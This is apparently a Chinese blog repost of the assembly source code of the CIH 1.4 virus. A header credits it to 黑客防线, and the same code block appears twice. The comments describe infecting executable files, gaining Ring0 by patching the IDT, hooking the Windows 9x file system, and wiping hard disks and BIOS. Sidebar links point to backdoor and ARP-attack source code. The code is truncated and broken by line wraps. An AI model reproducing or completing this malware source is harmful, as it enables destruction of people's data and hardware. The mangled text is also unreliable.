宋科明
- 浏览: 101597 次
- 性别:
- 来自: 深圳
-
最新评论
-
zpap:
这样的的设置好像是有问题的..
JDK环境变量配置小工具 -
qiaoxia_lan:
都不能访问,这是怎么回事啊。
为JAVA爱好者提供了超过400本电子书和3部视频 -
Tortoise:
最好多一些视频文件,个人感觉比较好一点
为JAVA爱好者提供了超过400本电子书和3部视频 -
skj198568:
看看了,好书还不少。
为JAVA爱好者提供了超过400本电子书和3部视频 -
njuptsoz:
谢谢分享!
JDK环境变量配置小工具
CIH 1.4源程序
信息来源:黑客防线
; ********************************************************************
********
; * The Virus Program Information
*
; ********************************************************************
********
; *
*
; * Designer : CIH Source : TTIT of TATUNG in Tai
wan *
; * Create Date : 04/26/1998 Now Version : 1.4
*
; * Modification Time : 05/31/1998
*
; *
*
; * Turbo Assembler Version 4.0 : tasm /m cih
*
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe
*
; *
*
; *===================================================================
=======*
; * Modification History
*
; *===================================================================
=======*
; * v1.0 1. Create the Virus Program.
*
; * 2. The Virus Modifies IDT to Get Ring0 Privilege.
*
; * 04/26/1998 3. Virus Code doesn't Reload into System.
*
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File S
ystem. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApi
Hook. *
; * 6. When System Opens Existing PE File, the File will b
e *
; * Infected, and the File doesn't be Reinfected.
*
; * 7. It is also Infected, even the File is Read-Only.
*
; * 8. When the File is Infected, the Modification Date an
d Time *
; * of the File also don't be Changed.
*
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not
Call *
; * Previous FileSystemApiHook, it will Call the Functi
on *
; * that the IFS Manager Would Normally Call to Impleme
nt *
; * this Particular I/O Request.
*
; * 10. The Virus Size is only 656 Bytes.
*
; *===================================================================
=======*
; * v1.1 1. Especially, the File that be Infected will not Incr
ease *
; * it's Size... ^__^
*
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.
*
; * When Exception Error Occurs, Our OS System should b
e in *
; * Windows NT. So My Cute Virus will not Continue to R
un, *
; * it will Jmup to Original Application to Run.
*
; * 3. Use Better Algorithm, Reduce Virus Code Size.
*
; * 4. The Virus "Basic" Size is only 796 Bytes.
*
; *===================================================================
=======*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...
*
; * 2. Modify the Bug of v1.1
*
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.
*
; *===================================================================
=======*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Er
ror. *
; * So When Open WinZip Self-Extractor ==> Don't Infect
it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes.
*
; *===================================================================
=======*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs
Error. *
; * 2. Change the Date of Killing Computers.
*
; * 05/31/1998 3. Modify Virus Version Copyright.
*
; * 4. The Virus "Basic" Size is 1019 Bytes.
*
; ********************************************************************
********
.586P
; ********************************************************************
********
; * Original PE Executable File(Don't Modify this Section)
*
; ********************************************************************
********
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF
= 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Excep
tion
mov [ebx+02h], si ; Entry Point
Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateExce
ption
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateExce
ption Aga
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to S
tack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-Return
AddressOf
dException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My V
irus Exis
in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocat
e
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, a
nd flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory S
tart Addr
s
lea eax, MyVirusStart-@2[esi]
iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSyste
mApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, a
nd flags
mov dr0, eax ; Save OldFileSystemAp
iHook Add
ss
pop eax ; EAX = FileSystemApiHook Addr
ess
; Save Old IFSMgr_InstallFileSystemApiHook Ent
ry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@
2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], e
dx
; Modify IFSMgr_InstallFileSystemApiHook Entry
Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:
push ebx
call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemAp
iHook
add ebx, FileSystemApiHook-@4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystem
ApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, a
nd flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHoo
k
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHoo
k
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystem
ApiHook A
ress
pop eax
pop ebx
ret
; *********************************************************
; * Static Data *
; *********************************************************
OldInstallFileSystemApiHook dd ?
&nb
; ********************************************************************
********
; * The Virus Program Information
*
; ********************************************************************
********
; *
*
; * Designer : CIH Source : TTIT of TATUNG in Tai
wan *
; * Create Date : 04/26/1998 Now Version : 1.4
*
; * Modification Time : 05/31/1998
*
; *
*
; * Turbo Assembler Version 4.0 : tasm /m cih
*
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe
*
; *
*
; *===================================================================
=======*
; * Modification History
*
; *===================================================================
=======*
; * v1.0 1. Create the Virus Program.
*
; * 2. The Virus Modifies IDT to Get Ring0 Privilege.
*
; * 04/26/1998 3. Virus Code doesn't Reload into System.
*
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File S
ystem. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApi
Hook. *
; * 6. When System Opens Existing PE File, the File will b
e *
; * Infected, and the File doesn't be Reinfected.
*
; * 7. It is also Infected, even the File is Read-Only.
*
; * 8. When the File is Infected, the Modification Date an
d Time *
; * of the File also don't be Changed.
*
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not
Call *
; * Previous FileSystemApiHook, it will Call the Functi
on *
; * that the IFS Manager Would Normally Call to Impleme
nt *
; * this Particular I/O Request.
*
; * 10. The Virus Size is only 656 Bytes.
*
; *===================================================================
=======*
; * v1.1 1. Especially, the File that be Infected will not Incr
ease *
; * it's Size... ^__^
*
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.
*
; * When Exception Error Occurs, Our OS System should b
e in *
; * Windows NT. So My Cute Virus will not Continue to R
un, *
; * it will Jmup to Original Application to Run.
*
; * 3. Use Better Algorithm, Reduce Virus Code Size.
*
; * 4. The Virus "Basic" Size is only 796 Bytes.
*
; *===================================================================
=======*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...
*
; * 2. Modify the Bug of v1.1
*
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.
*
; *===================================================================
=======*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Er
ror. *
; * So When Open WinZip Self-Extractor ==> Don't Infect
it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes.
*
; *===================================================================
=======*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs
Error. *
; * 2. Change the Date of Killing Computers.
*
; * 05/31/1998 3. Modify Virus Version Copyright.
*
; * 4. The Virus "Basic" Size is 1019 Bytes.
*
; ********************************************************************
********
.586P
; ********************************************************************
********
; * Original PE Executable File(Don't Modify this Section)
*
; ********************************************************************
********
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF
= 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Excep
tion
mov [ebx+02h], si ; Entry Point
Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateExce
ption
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateExce
ption Aga
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to S
tack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-Return
AddressOf
dException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My V
irus Exis
in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocat
e
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, a
nd flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory S
tart Addr
s
lea eax, MyVirusStart-@2[esi]
iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSyste
mApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, a
nd flags
mov dr0, eax ; Save OldFileSystemAp
iHook Add
ss
pop eax ; EAX = FileSystemApiHook Addr
ess
; Save Old IFSMgr_InstallFileSystemApiHook Ent
ry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@
2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], e
dx
; Modify IFSMgr_InstallFileSystemApiHook Entry
Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:
push ebx
call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemAp
iHook
add ebx, FileSystemApiHook-@4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystem
ApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, a
nd flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHoo
k
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHoo
k
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystem
ApiHook A
ress
pop eax
pop ebx
ret
; *********************************************************
; * Static Data *
; *********************************************************
OldInstallFileSystemApiHook dd ?
&nb
分享到:
发表评论
-
为JAVA爱好者提供了超过400本电子书和3部视频
2009-01-10 14:20 2470http://www.ibook8.com/book/java ... -
http://blog.csdn.net/ycw/
2008-08-08 15:52 843http://blog.csdn.net/ycw/ ... -
WinCVS与CVSNT简明使用手则
2008-08-08 15:51 1223WinCVS与CVSNT简明使用手 ... -
WinCVS与CVSNT简明使用手则
2008-08-08 15:50 11361、前言:CVS是版本控制 ... -
CVS使用手册(推荐)
2008-08-08 15:47 1281版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出 ... -
用cvs实现复杂的权限控制
2008-08-08 15:46 3492作者:张元一这篇文章的基础是:为CVS建立只读用户,如果你对C ... -
CVSNT用户管理方案
2008-08-08 15:46 1130所有这些操作基于的环境和软件版本:WINDOWS2000 Pr ... -
CVS中增加目录及标签和分支
2008-08-08 15:44 30651.在cvs中增加目录. 如果要在CVS中增加一个目录层,而不 ... -
CVS权限设置
2008-08-08 15:43 2268不同用户设置不同的访 ... -
关于CVS在Window2000下的权限管理
2008-08-08 15:40 891一. CVS版本问题 CVS分开客户端和服务器端两个程序 ... -
数据感知控件之浮想联翩
2008-07-19 15:44 1079Delphi制作数据感知控件之浮想联翩 知识点本文共有6个关于 ... -
SQL备份
2008-07-17 10:01 780备份: backupsql := 'backup databa ... -
SQL导入/导出Excel
2008-07-17 10:01 1168这是在CSDN上邹键的东 ... -
portscan程序代码
2008-06-25 16:33 884#include <afxext.h> #incl ... -
ARP攻击软件源码
2008-06-25 16:29 1361/****************************** ... -
微软ping命令的源代码
2008-06-25 16:29 851/****************************** ... -
MD5破解相关MAKE.bat
2008-06-25 16:27 1037信息来源:xfocus z:\md5coll>MAKE ... -
一段隐藏文件的C++程序源代码
2008-06-25 16:25 2684#include <iostream>#inclu ... -
TCP多线程正向后门源代码
2008-06-25 16:23 1206#!usr/bin/perl -w #duo_xian_nc. ... -
简易Telnet后门源代码
2008-06-25 16:19 1941/////////////////////////////// ...
相关推荐
### CIH v1.4 病毒分析:深度解读与技术解析 #### 知识点一:CIH病毒概述 CIH病毒,全称Chernobyl Virus,以其首次大规模爆发日期(每年的4月26日)与切尔诺贝利核电站事故日期相同而得名。该病毒于1998年被首次...
C++编写的清除CIH病毒程序源代码,C++编写的清除CIH病毒程序源代码
### CIH 1.5病毒源代码分析 #### 背景介绍 CIH病毒,全称为Chernobyl Virus,是由台湾程序员陈盈豪在1998年编写的一种破坏性极强的计算机病毒。该病毒以破坏计算机硬件而闻名,尤其是其能够重写BIOS,导致计算机...
"控制台"、"源码"和"资源"这些标签可能意味着"CIHsafe"程序不仅是一个可执行的二进制文件,还可能包含源代码和其他相关资源。对于开发者来说,源码可以作为学习反病毒技术的参考资料,了解如何检测和清除CIH病毒。...
CIH病毒免疫程序,可以通过这个程序大致了解CIH病毒代码的基本特征,希望能有用处。
CIH v1.4是该病毒的一个版本,其源代码在此文档中被提及。 在软件开发领域,了解像CIH这样的病毒的源代码对于安全研究和防范措施至关重要。以下是基于描述中的内容提取的一些关键知识点: 1. **病毒感染机制**: ...
【标题】"联想CIH81M.rar"指的是联想公司的一款主板——CIH81M的BIOS固件更新文件,该文件以RAR压缩格式存储。RAR是一种常见的数据压缩和存档格式,由Eugene Roshal开发,用于减少文件大小以便于传输和存储。 ...
- **创建日期**:1998年4月26日,当前版本为1.4。 - **修改时间**:1998年5月31日。 - **编译环境**: - Turbo Assembler Version 4.0:tasm/mcih - Turbo Link Version 3.01:tlink/3/tcih, cih.exe #### 三、...
根据提供的CIH病毒源代码的信息,我们可以深入了解CIH病毒的设计理念、发展历史及其技术细节。CIH(Chernobyl Infector for Harddisk)是一种臭名昭著的计算机病毒,以其破坏性和创新性而闻名。下面我们将从CIH病毒...
CIH病毒的历史可以追溯到1998年,当时它的不同版本相继出现,包括v1.0至v1.4。每个版本都略有改进,增强了病毒的传播能力和破坏力。例如,v1.1增加了自我保护机制,使得病毒更难被清除;v1.2和v1.3则提高了感染率;v...
根据给定文件的信息,我们可以梳理出关于CIH病毒的一些关键知识点: ### CIH病毒概述 CIH(Chernobyl Virus)病毒是一个臭名昭著的计算机病毒,它以其破坏性和创新性而闻名。该病毒首次出现于1998年,由台湾大同...
这是CIH程序的源码, 以及其所用的Turbo Assembler 编译器, 和二进制原版程序。 CIH的功能是将自身复制到其他的exe文件,调用Windows 9x系统的内核vxd, 以及改写早期计算机的BIOS, 读写硬盘等。 解压密码: m0_...
本文将深入解析CIH病毒的部分源代码,帮助理解其工作原理和危害机制。 #### 设计者与创建日期 CIH病毒的设计者为CIH Source,来源于台湾大同大学(TTIT of Tatung)。创建日期为1998年4月26日,当前版本为1.4,...
另一方面,北京瑞星电脑科技开发有限责任公司强调其提供的程序仅适用于被CIH病毒破坏的硬盘,不建议在正常硬盘上使用。他们指出,程序可能无法保证完全恢复所有数据,但会尽力恢复用户数据,并提醒用户在修复成功后...
标题“联想C440 cih61s1 ver1.0 图纸”暗示了这是一份来自联想公司,型号为C440的一体机主板的详细图纸文件,它使用的是cih61s1芯片组,版本号为ver1.0。该图纸内容涉及硬件设计的各个方面,为维修、升级或是理解...
CIH源码
- **物理内存修改**:CIH病毒还定义了一个新的异常处理程序`NewExceptionHook`,在这个处理程序中,它会直接修改物理内存中的特定地址。例如,将物理地址0000:0525处的值改为特定的值。 ```asm NewExceptionHook...
这个示例程序展示了如何利用类似CIH病毒的技术来在应用程序中调用VMM功能,尽管这可能带来安全风险。在实际应用中,这样的技术可以用于系统调试、性能优化或者研究操作系统内部工作原理,但同时也可能被恶意软件利用...
1、瑞星公司提供的本程序只是针对CIH病毒破坏的硬盘进行修复,对于正常的硬盘不要使用本程序处理。 2、本程序不保证修复所有硬盘数据,也不能保证修复后的数据是完全正确的,只是尽可能修复用户数据。 本...
### CIH病毒与硬盘破坏分析 #### CIH病毒概述 CIH病毒,全称为“Chernobyl Virus”,因其设计者陈盈豪(CIH)而得名,且首次大规模爆发是在1999年4月26日,即切尔诺贝利核事故纪念日,故又称为“切尔诺贝利病毒”...